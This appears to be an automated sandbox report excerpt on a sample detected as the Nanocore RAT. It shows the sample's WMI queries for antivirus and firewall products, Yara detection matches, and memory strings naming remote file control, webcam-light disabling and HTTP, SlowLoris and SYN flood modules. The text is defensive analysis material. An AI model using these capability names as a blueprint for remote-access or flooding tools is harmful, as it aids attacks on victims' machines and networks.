      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\tchnhwrvi.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441fa31.20.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df4629.30.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.417058.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3290000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f8cc52.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.5df0000.31.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.441b408.27.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e35511.25.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b13658.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f91a88.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d3ef95.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.400000.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4406f6d.24.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e30ee8.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.3330000.5.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4e2c0b2.21.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d32d61.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4d535c2.15.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.159d2c8.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 1.2.tchnhwrvi.exe.b00000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.2.tchnhwrvi.exe.4f960b1.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.570983718.0000000005DF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.309024218.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004404000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565935661.0000000003332000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.567185811.0000000004F8C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000002.565592440.0000000003290000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: tchnhwrvi.exe PID: 1312, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: tchnhwrvi.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: tchnhwrvi.exe, 00000002.00000002.564994074.0000000001587000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571891406.0000000007620000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.571954055.0000000007660000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: tchnhwrvi.exe, 00000002.00000002.567185811.0000000004C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentD